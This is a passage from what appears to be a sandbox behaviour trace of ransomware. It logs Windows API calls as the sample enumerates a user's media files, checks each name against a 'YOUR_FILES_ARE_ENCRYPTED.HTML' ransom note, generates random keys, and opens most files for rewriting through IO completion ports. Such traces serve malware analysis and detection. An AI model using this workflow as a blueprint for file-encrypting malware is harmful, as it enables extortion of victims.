ftLastWriteTime.dwHighDateTime=0x1d7e638, nFileSizeHigh=0x0, nFileSizeLow=0x153be, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="6KGcivaX3av8lNTw.mp3", cAlternateFileName="6KGCIV~1.MP3")) returned 1 [0164.897] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\6KGcivaX3av8lNTw.mp3") returned 60 [0164.897] lstrcmpW (lpString1="6KGcivaX3av8lNTw.mp3", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0164.897] PathFindExtensionW (pszPath="6KGcivaX3av8lNTw.mp3") returned=".mp3" [0164.897] lstrlenW (lpString=".mp3") returned 4 [0164.897] PathFindExtensionW (pszPath="6KGcivaX3av8lNTw.mp3") returned=".mp3" [0164.897] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0164.897] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\6KGcivaX3av8lNTw.mp3" (normalized: "c:\\users\\5alr3u30d3\\appdata\\roaming\\6kgcivax3av8lntw.mp3"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x598 [0164.898] GetFileSizeEx (in: hFile=0x598, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=86974) returned 1 [0164.898] GetProcessHeap () returned 0x270000 [0164.898] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x74c2008 [0164.899] wsprintfW (in: param_1=0x4ebda36, param_2="%02X" | out: param_1="F7") returned 2 [0164.899] wsprintfW (in: param_1=0x4ebda3a, param_2="%02X" | out: param_1="55") returned 2 [0164.899] wsprintfW (in: param_1=0x4ebda3e, param_2="%02X" | out: param_1="72") returned 2 [0164.899] wsprintfW (in: param_1=0x4ebda42, param_2="%02X" | out: param_1="D5") returned 2 [0164.899] wsprintfW (in: param_1=0x4ebda46, param_2="%02X" | out: param_1="01") returned 2 [0164.899] wsprintfW (in: param_1=0x4ebda4a, param_2="%02X" | out: param_1="5D") returned 2 [0164.899] wsprintfW (in: param_1=0x4ebda4e, param_2="%02X" | out: param_1="96") returned 2 [0164.899] wsprintfW (in: param_1=0x4ebda52, param_2="%02X" | out: param_1="60") returned 2 [0164.899] wsprintfW (in: param_1=0x4ebda56, param_2="%02X" | out: param_1="32") returned 2 [0164.899] wsprintfW (in: param_1=0x4ebda5a, param_2="%02X" | out: param_1="05") returned 2 [0164.899] wsprintfW (in: param_1=0x4ebda5e, param_2="%02X" | out: param_1="1A") returned 2 [0164.899] wsprintfW (in: param_1=0x4ebda62, param_2="%02X" | out: param_1="CC") returned 2 [0164.899] wsprintfW (in: param_1=0x4ebda66, param_2="%02X" | out: param_1="D0") returned 2 [0164.899] wsprintfW (in: param_1=0x4ebda6a, param_2="%02X" | out: param_1="91") returned 2 [0164.899] wsprintfW (in: param_1=0x4ebda6e, param_2="%02X" | out: param_1="DA") returned 2 [0164.899] wsprintfW (in: param_1=0x4ebda72, param_2="%02X" | out: param_1="0A") returned 2 [0164.899] wsprintfW (in: param_1=0x4ebda76, param_2="%02X" | out: param_1="D7") returned 2 [0164.899] wsprintfW (in: param_1=0x4ebda7a, param_2="%02X" | out: param_1="A7") returned 2 [0164.899] wsprintfW (in: param_1=0x4ebda7e, param_2="%02X" | out: param_1="A6") returned 2 [0164.899] wsprintfW (in: param_1=0x4ebda82, param_2="%02X" | out: param_1="30") returned 2 [0164.899] wsprintfW (in: param_1=0x4ebda86, param_2="%02X" | out: param_1="3C") returned 2 [0164.899] wsprintfW (in: param_1=0x4ebda8a, param_2="%02X" | out: param_1="1C") returned 2 [0164.899] wsprintfW (in: param_1=0x4ebda8e, param_2="%02X" | out: param_1="C5") returned 2 [0164.900] wsprintfW (in: param_1=0x4ebda92, param_2="%02X" | out: param_1="F2") returned 2 [0164.900] wsprintfW (in: param_1=0x4ebda96, param_2="%02X" | out: param_1="49") returned 2 [0164.900] wsprintfW (in: param_1=0x4ebda9a, param_2="%02X" | out: param_1="D8") returned 2 [0164.900] wsprintfW (in: param_1=0x4ebda9e, param_2="%02X" | out: param_1="D2") returned 2 [0164.900] wsprintfW (in: param_1=0x4ebdaa2, param_2="%02X" | out: param_1="85") returned 2 [0164.900] wsprintfW (in: param_1=0x4ebdaa6, param_2="%02X" | out: param_1="F1") returned 2 [0164.900] wsprintfW (in: param_1=0x4ebdaaa, param_2="%02X" | out: param_1="9C") returned 2 [0164.900] wsprintfW (in: param_1=0x4ebdaae, param_2="%02X" | out: param_1="F9") returned 2 [0164.900] wsprintfW (in: param_1=0x4ebdab2, param_2="%02X" | out: param_1="41") returned 2 [0164.901] lstrcpyW (in: lpString1=0x74d20bc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\6KGcivaX3av8lNTw.mp3" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\6KGcivaX3av8lNTw.mp3") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\6KGcivaX3av8lNTw.mp3" [0164.901] CreateIoCompletionPort (FileHandle=0x598, ExistingCompletionPort=0x3a0, CompletionKey=0x74c2008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0164.901] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x74c2008, lpOverlapped=0x74c2008) returned 1 [0164.918] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3d67b160, ftCreationTime.dwHighDateTime=0x1d7df81, ftLastAccessTime.dwLowDateTime=0x5c648d50, ftLastAccessTime.dwHighDateTime=0x1d7df8f, ftLastWriteTime.dwLowDateTime=0x5c648d50, ftLastWriteTime.dwHighDateTime=0x1d7df8f, nFileSizeHigh=0x0, nFileSizeLow=0x60e, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="9evL6_piVJixL3I.wav", cAlternateFileName="9EVL6_~1.WAV")) returned 1 [0164.918] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\9evL6_piVJixL3I.wav") returned 59 [0164.918] lstrcmpW (lpString1="9evL6_piVJixL3I.wav", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0164.918] PathFindExtensionW (pszPath="9evL6_piVJixL3I.wav") returned=".wav" [0164.918] lstrlenW (lpString=".wav") returned 4 [0164.918] PathFindExtensionW (pszPath="9evL6_piVJixL3I.wav") returned=".wav" [0164.918] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0164.918] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\9evL6_piVJixL3I.wav" (normalized: "c:\\users\\5alr3u30d3\\appdata\\roaming\\9evl6_pivjixl3i.wav"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x598 [0164.919] GetFileSizeEx (in: hFile=0x598, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=1550) returned 1 [0164.919] GetProcessHeap () returned 0x270000 [0164.919] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x74c2008 [0164.920] wsprintfW (in: param_1=0x4ebda36, param_2="%02X" | out: param_1="50") returned 2 [0164.920] wsprintfW (in: param_1=0x4ebda3a, param_2="%02X" | out: param_1="1C") returned 2 [0164.920] wsprintfW (in: param_1=0x4ebda3e, param_2="%02X" | out: param_1="4E") returned 2 [0164.920] wsprintfW (in: param_1=0x4ebda42, param_2="%02X" | out: param_1="F0") returned 2 [0164.920] wsprintfW (in: param_1=0x4ebda46, param_2="%02X" | out: param_1="A4") returned 2 [0164.920] wsprintfW (in: param_1=0x4ebda4a, param_2="%02X" | out: param_1="D0") returned 2 [0164.920] wsprintfW (in: param_1=0x4ebda4e, param_2="%02X" | out: param_1="43") returned 2 [0164.920] wsprintfW (in: param_1=0x4ebda52, param_2="%02X" | out: param_1="9F") returned 2 [0164.920] wsprintfW (in: param_1=0x4ebda56, param_2="%02X" | out: param_1="4C") returned 2 [0164.920] wsprintfW (in: param_1=0x4ebda5a, param_2="%02X" | out: param_1="DB") returned 2 [0164.920] wsprintfW (in: param_1=0x4ebda5e, param_2="%02X" | out: param_1="1B") returned 2 [0164.920] wsprintfW (in: param_1=0x4ebda62, param_2="%02X" | out: param_1="52") returned 2 [0164.920] wsprintfW (in: param_1=0x4ebda66, param_2="%02X" | out: param_1="9E") returned 2 [0164.920] wsprintfW (in: param_1=0x4ebda6a, param_2="%02X" | out: param_1="D2") returned 2 [0164.920] wsprintfW (in: param_1=0x4ebda6e, param_2="%02X" | out: param_1="06") returned 2 [0164.920] wsprintfW (in: param_1=0x4ebda72, param_2="%02X" | out: param_1="5A") returned 2 [0164.920] wsprintfW (in: param_1=0x4ebda76, param_2="%02X" | out: param_1="CF") returned 2 [0164.920] wsprintfW (in: param_1=0x4ebda7a, param_2="%02X" | out: param_1="42") returned 2 [0164.920] wsprintfW (in: param_1=0x4ebda7e, param_2="%02X" | out: param_1="5C") returned 2 [0164.921] wsprintfW (in: param_1=0x4ebda82, param_2="%02X" | out: param_1="20") returned 2 [0164.921] wsprintfW (in: param_1=0x4ebda86, param_2="%02X" | out: param_1="94") returned 2 [0164.921] wsprintfW (in: param_1=0x4ebda8a, param_2="%02X" | out: param_1="01") returned 2 [0164.921] wsprintfW (in: param_1=0x4ebda8e, param_2="%02X" | out: param_1="06") returned 2 [0164.921] wsprintfW (in: param_1=0x4ebda92, param_2="%02X" | out: param_1="A6") returned 2 [0164.921] wsprintfW (in: param_1=0x4ebda96, param_2="%02X" | out: param_1="A5") returned 2 [0164.921] wsprintfW (in: param_1=0x4ebda9a, param_2="%02X" | out: param_1="EB") returned 2 [0164.921] wsprintfW (in: param_1=0x4ebda9e, param_2="%02X" | out: param_1="8E") returned 2 [0164.921] wsprintfW (in: param_1=0x4ebdaa2, param_2="%02X" | out: param_1="3F") returned 2 [0164.921] wsprintfW (in: param_1=0x4ebdaa6, param_2="%02X" | out: param_1="E8") returned 2 [0164.921] wsprintfW (in: param_1=0x4ebdaaa, param_2="%02X" | out: param_1="46") returned 2 [0164.921] wsprintfW (in: param_1=0x4ebdaae, param_2="%02X" | out: param_1="35") returned 2 [0164.921] wsprintfW (in: param_1=0x4ebdab2, param_2="%02X" | out: param_1="24") returned 2 [0164.922] lstrcpyW (in: lpString1=0x74d20bc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\9evL6_piVJixL3I.wav" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\9evL6_piVJixL3I.wav") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\9evL6_piVJixL3I.wav" [0164.922] CreateIoCompletionPort (FileHandle=0x598, ExistingCompletionPort=0x3a0, CompletionKey=0x74c2008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0164.922] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x74c2008, lpOverlapped=0x74c2008) returned 1 [0164.944] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xd57ba1b0, ftCreationTime.dwHighDateTime=0x1d7e133, ftLastAccessTime.dwLowDateTime=0x73f6a0d0, ftLastAccessTime.dwHighDateTime=0x1d7e556, ftLastWriteTime.dwLowDateTime=0x73f6a0d0, ftLastWriteTime.dwHighDateTime=0x1d7e556, nFileSizeHigh=0x0, nFileSizeLow=0x237d, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="Ahtk.mp3", cAlternateFileName="")) returned 1 [0164.944] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Ahtk.mp3") returned 48 [0164.944] lstrcmpW (lpString1="Ahtk.mp3", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0164.944] PathFindExtensionW (pszPath="Ahtk.mp3") returned=".mp3" [0164.944] lstrlenW (lpString=".mp3") returned 4 [0164.944] PathFindExtensionW (pszPath="Ahtk.mp3") returned=".mp3" [0164.944] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0164.944] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Ahtk.mp3" (normalized: "c:\\users\\5alr3u30d3\\appdata\\roaming\\ahtk.mp3"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x598 [0164.945] GetFileSizeEx (in: hFile=0x598, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=9085) returned 1 [0164.945] GetProcessHeap () returned 0x270000 [0164.945] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x74c2008 [0164.946] wsprintfW (in: param_1=0x4ebda36, param_2="%02X" | out: param_1="0E") returned 2 [0164.946] wsprintfW (in: param_1=0x4ebda3a, param_2="%02X" | out: param_1="45") returned 2 [0164.946] wsprintfW (in: param_1=0x4ebda3e, param_2="%02X" | out: param_1="E3") returned 2 [0164.946] wsprintfW (in: param_1=0x4ebda42, param_2="%02X" | out: param_1="19") returned 2 [0164.946] wsprintfW (in: param_1=0x4ebda46, param_2="%02X" | out: param_1="18") returned 2 [0164.946] wsprintfW (in: param_1=0x4ebda4a, param_2="%02X" | out: param_1="F2") returned 2 [0164.946] wsprintfW (in: param_1=0x4ebda4e, param_2="%02X" | out: param_1="26") returned 2 [0164.946] wsprintfW (in: param_1=0x4ebda52, param_2="%02X" | out: param_1="F3") returned 2 [0164.946] wsprintfW (in: param_1=0x4ebda56, param_2="%02X" | out: param_1="ED") returned 2 [0164.946] wsprintfW (in: param_1=0x4ebda5a, param_2="%02X" | out: param_1="F1") returned 2 [0164.946] wsprintfW (in: param_1=0x4ebda5e, param_2="%02X" | out: param_1="9A") returned 2 [0164.946] wsprintfW (in: param_1=0x4ebda62, param_2="%02X" | out: param_1="8E") returned 2 [0164.946] wsprintfW (in: param_1=0x4ebda66, param_2="%02X" | out: param_1="05") returned 2 [0164.946] wsprintfW (in: param_1=0x4ebda6a, param_2="%02X" | out: param_1="90") returned 2 [0164.946] wsprintfW (in: param_1=0x4ebda6e, param_2="%02X" | out: param_1="1A") returned 2 [0164.946] wsprintfW (in: param_1=0x4ebda72, param_2="%02X" | out: param_1="F0") returned 2 [0164.946] wsprintfW (in: param_1=0x4ebda76, param_2="%02X" | out: param_1="7C") returned 2 [0164.946] wsprintfW (in: param_1=0x4ebda7a, param_2="%02X" | out: param_1="08") returned 2 [0164.946] wsprintfW (in: param_1=0x4ebda7e, param_2="%02X" | out: param_1="E1") returned 2 [0164.946] wsprintfW (in: param_1=0x4ebda82, param_2="%02X" | out: param_1="35") returned 2 [0164.946] wsprintfW (in: param_1=0x4ebda86, param_2="%02X" | out: param_1="E3") returned 2 [0164.946] wsprintfW (in: param_1=0x4ebda8a, param_2="%02X" | out: param_1="4B") returned 2 [0164.946] wsprintfW (in: param_1=0x4ebda8e, param_2="%02X" | out: param_1="2A") returned 2 [0164.946] wsprintfW (in: param_1=0x4ebda92, param_2="%02X" | out: param_1="35") returned 2 [0164.946] wsprintfW (in: param_1=0x4ebda96, param_2="%02X" | out: param_1="F1") returned 2 [0164.946] wsprintfW (in: param_1=0x4ebda9a, param_2="%02X" | out: param_1="FA") returned 2 [0164.947] wsprintfW (in: param_1=0x4ebda9e, param_2="%02X" | out: param_1="AB") returned 2 [0164.947] wsprintfW (in: param_1=0x4ebdaa2, param_2="%02X" | out: param_1="14") returned 2 [0164.947] wsprintfW (in: param_1=0x4ebdaa6, param_2="%02X" | out: param_1="68") returned 2 [0164.947] wsprintfW (in: param_1=0x4ebdaaa, param_2="%02X" | out: param_1="B3") returned 2 [0164.947] wsprintfW (in: param_1=0x4ebdaae, param_2="%02X" | out: param_1="8F") returned 2 [0164.947] wsprintfW (in: param_1=0x4ebdab2, param_2="%02X" | out: param_1="1A") returned 2 [0164.947] lstrcpyW (in: lpString1=0x74d20bc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Ahtk.mp3" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Ahtk.mp3") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Ahtk.mp3" [0164.947] CreateIoCompletionPort (FileHandle=0x598, ExistingCompletionPort=0x3a0, CompletionKey=0x74c2008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0164.947] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x74c2008, lpOverlapped=0x74c2008) returned 1 [0164.959] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3eeac6d0, ftCreationTime.dwHighDateTime=0x1d7e643, ftLastAccessTime.dwLowDateTime=0xbfaa4210, ftLastAccessTime.dwHighDateTime=0x1d7e782, ftLastWriteTime.dwLowDateTime=0xbfaa4210, ftLastWriteTime.dwHighDateTime=0x1d7e782, nFileSizeHigh=0x0, nFileSizeLow=0x53ec, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="atQPmg.avi", cAlternateFileName="")) returned 1 [0164.959] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\atQPmg.avi") returned 50 [0164.959] lstrcmpW (lpString1="atQPmg.avi", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0164.959] PathFindExtensionW (pszPath="atQPmg.avi") returned=".avi" [0164.959] lstrlenW (lpString=".avi") returned 4 [0164.959] PathFindExtensionW (pszPath="atQPmg.avi") returned=".avi" [0164.959] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0164.959] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\atQPmg.avi" (normalized: "c:\\users\\5alr3u30d3\\appdata\\roaming\\atqpmg.avi"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x598 [0164.960] GetFileSizeEx (in: hFile=0x598, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=21484) returned 1 [0164.960] GetProcessHeap () returned 0x270000 [0164.960] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x74c2008 [0164.961] wsprintfW (in: param_1=0x4ebda36, param_2="%02X" | out: param_1="27") returned 2 [0164.961] wsprintfW (in: param_1=0x4ebda3a, param_2="%02X" | out: param_1="BC") returned 2 [0164.961] wsprintfW (in: param_1=0x4ebda3e, param_2="%02X" | out: param_1="C0") returned 2 [0164.961] wsprintfW (in: param_1=0x4ebda42, param_2="%02X" | out: param_1="05") returned 2 [0164.961] wsprintfW (in: param_1=0x4ebda46, param_2="%02X" | out: param_1="5D") returned 2 [0164.961] wsprintfW (in: param_1=0x4ebda4a, param_2="%02X" | out: param_1="90") returned 2 [0164.961] wsprintfW (in: param_1=0x4ebda4e, param_2="%02X" | out: param_1="C9") returned 2 [0164.961] wsprintfW (in: param_1=0x4ebda52, param_2="%02X" | out: param_1="FC") returned 2 [0164.961] wsprintfW (in: param_1=0x4ebda56, param_2="%02X" | out: param_1="B8") returned 2 [0164.961] wsprintfW (in: param_1=0x4ebda5a, param_2="%02X" | out: param_1="67") returned 2 [0164.961] wsprintfW (in: param_1=0x4ebda5e, param_2="%02X" | out: param_1="94") returned 2 [0164.961] wsprintfW (in: param_1=0x4ebda62, param_2="%02X" | out: param_1="D5") returned 2 [0164.961] wsprintfW (in: param_1=0x4ebda66, param_2="%02X" | out: param_1="35") returned 2 [0164.961] wsprintfW (in: param_1=0x4ebda6a, param_2="%02X" | out: param_1="F3") returned 2 [0164.961] wsprintfW (in: param_1=0x4ebda6e, param_2="%02X" | out: param_1="91") returned 2 [0164.961] wsprintfW (in: param_1=0x4ebda72, param_2="%02X" | out: param_1="6B") returned 2 [0164.962] wsprintfW (in: param_1=0x4ebda76, param_2="%02X" | out: param_1="27") returned 2 [0164.962] wsprintfW (in: param_1=0x4ebda7a, param_2="%02X" | out: param_1="B9") returned 2 [0164.962] wsprintfW (in: param_1=0x4ebda7e, param_2="%02X" | out: param_1="11") returned 2 [0164.962] wsprintfW (in: param_1=0x4ebda82, param_2="%02X" | out: param_1="5E") returned 2 [0164.962] wsprintfW (in: param_1=0x4ebda86, param_2="%02X" | out: param_1="75") returned 2 [0164.962] wsprintfW (in: param_1=0x4ebda8a, param_2="%02X" | out: param_1="F2") returned 2 [0164.962] wsprintfW (in: param_1=0x4ebda8e, param_2="%02X" | out: param_1="20") returned 2 [0164.962] wsprintfW (in: param_1=0x4ebda92, param_2="%02X" | out: param_1="05") returned 2 [0164.962] wsprintfW (in: param_1=0x4ebda96, param_2="%02X" | out: param_1="CB") returned 2 [0164.962] wsprintfW (in: param_1=0x4ebda9a, param_2="%02X" | out: param_1="1D") returned 2 [0164.962] wsprintfW (in: param_1=0x4ebda9e, param_2="%02X" | out: param_1="3E") returned 2 [0164.962] wsprintfW (in: param_1=0x4ebdaa2, param_2="%02X" | out: param_1="A9") returned 2 [0164.962] wsprintfW (in: param_1=0x4ebdaa6, param_2="%02X" | out: param_1="FA") returned 2 [0164.962] wsprintfW (in: param_1=0x4ebdaaa, param_2="%02X" | out: param_1="55") returned 2 [0164.962] wsprintfW (in: param_1=0x4ebdaae, param_2="%02X" | out: param_1="C2") returned 2 [0164.962] wsprintfW (in: param_1=0x4ebdab2, param_2="%02X" | out: param_1="79") returned 2 [0164.963] lstrcpyW (in: lpString1=0x74d20bc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\atQPmg.avi" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\atQPmg.avi") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\atQPmg.avi" [0164.963] CreateIoCompletionPort (FileHandle=0x598, ExistingCompletionPort=0x3a0, CompletionKey=0x74c2008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0164.963] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x74c2008, lpOverlapped=0x74c2008) returned 1 [0164.978] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa17ff780, ftCreationTime.dwHighDateTime=0x1d7e5f7, ftLastAccessTime.dwLowDateTime=0xe9ec1290, ftLastAccessTime.dwHighDateTime=0x1d7e6e9, ftLastWriteTime.dwLowDateTime=0xe9ec1290, ftLastWriteTime.dwHighDateTime=0x1d7e6e9, nFileSizeHigh=0x0, nFileSizeLow=0x18745, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="cQrq8.bmp", cAlternateFileName="")) returned 1 [0164.978] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\cQrq8.bmp") returned 49 [0164.978] lstrcmpW (lpString1="cQrq8.bmp", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0164.978] PathFindExtensionW (pszPath="cQrq8.bmp") returned=".bmp" [0164.978] lstrlenW (lpString=".bmp") returned 4 [0164.978] PathFindExtensionW (pszPath="cQrq8.bmp") returned=".bmp" [0164.979] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xcc7c61b0, ftCreationTime.dwHighDateTime=0x1d7e009, ftLastAccessTime.dwLowDateTime=0x500e7960, ftLastAccessTime.dwHighDateTime=0x1d7e3c4, ftLastWriteTime.dwLowDateTime=0x500e7960, ftLastWriteTime.dwHighDateTime=0x1d7e3c4, nFileSizeHigh=0x0, nFileSizeLow=0x154be, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="dHf2m Cw8A.swf", cAlternateFileName="DHF2MC~1.SWF")) returned 1 [0164.979] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\dHf2m Cw8A.swf") returned 54 [0164.979] lstrcmpW (lpString1="dHf2m Cw8A.swf", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0164.979] PathFindExtensionW (pszPath="dHf2m Cw8A.swf") returned=".swf" [0164.979] lstrlenW (lpString=".swf") returned 4 [0164.979] PathFindExtensionW (pszPath="dHf2m Cw8A.swf") returned=".swf" [0164.979] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa7f61ca0, ftCreationTime.dwHighDateTime=0x1d7dae1, ftLastAccessTime.dwLowDateTime=0xfc35f370, ftLastAccessTime.dwHighDateTime=0x1d7e1ea, ftLastWriteTime.dwLowDateTime=0xfc35f370, ftLastWriteTime.dwHighDateTime=0x1d7e1ea, nFileSizeHigh=0x0, nFileSizeLow=0x10e51, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="E0cfMGggco.flv", cAlternateFileName="E0CFMG~1.FLV")) returned 1 [0164.979] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\E0cfMGggco.flv") returned 54 [0164.979] lstrcmpW (lpString1="E0cfMGggco.flv", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0164.979] PathFindExtensionW (pszPath="E0cfMGggco.flv") returned=".flv" [0164.979] lstrlenW (lpString=".flv") returned 4 [0164.979] PathFindExtensionW (pszPath="E0cfMGggco.flv") returned=".flv" [0164.979] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0164.979] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\E0cfMGggco.flv" (normalized: "c:\\users\\5alr3u30d3\\appdata\\roaming\\e0cfmgggco.flv"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x598 [0164.980] GetFileSizeEx (in: hFile=0x598, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=69201) returned 1 [0164.980] GetProcessHeap () returned 0x270000 [0164.980] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x74c2008 [0164.981] wsprintfW (in: param_1=0x4ebda36, param_2="%02X" | out: param_1="66") returned 2 [0164.981] wsprintfW (in: param_1=0x4ebda3a, param_2="%02X" | out: param_1="BE") returned 2 [0164.981] wsprintfW (in: param_1=0x4ebda3e, param_2="%02X" | out: param_1="4B") returned 2 [0164.981] wsprintfW (in: param_1=0x4ebda42, param_2="%02X" | out: param_1="6D") returned 2 [0164.981] wsprintfW (in: param_1=0x4ebda46, param_2="%02X" | out: param_1="06") returned 2 [0164.981] wsprintfW (in: param_1=0x4ebda4a, param_2="%02X" | out: param_1="DB") returned 2 [0164.981] wsprintfW (in: param_1=0x4ebda4e, param_2="%02X" | out: param_1="21") returned 2 [0164.981] wsprintfW (in: param_1=0x4ebda52, param_2="%02X" | out: param_1="0E") returned 2 [0164.981] wsprintfW (in: param_1=0x4ebda56, param_2="%02X" | out: param_1="E9") returned 2 [0164.981] wsprintfW (in: param_1=0x4ebda5a, param_2="%02X" | out: param_1="92") returned 2 [0164.981] wsprintfW (in: param_1=0x4ebda5e, param_2="%02X" | out: param_1="C7") returned 2 [0164.981] wsprintfW (in: param_1=0x4ebda62, param_2="%02X" | out: param_1="AD") returned 2 [0164.981] wsprintfW (in: param_1=0x4ebda66, param_2="%02X" | out: param_1="C3") returned 2 [0164.981] wsprintfW (in: param_1=0x4ebda6a, param_2="%02X" | out: param_1="ED") returned 2 [0164.981] wsprintfW (in: 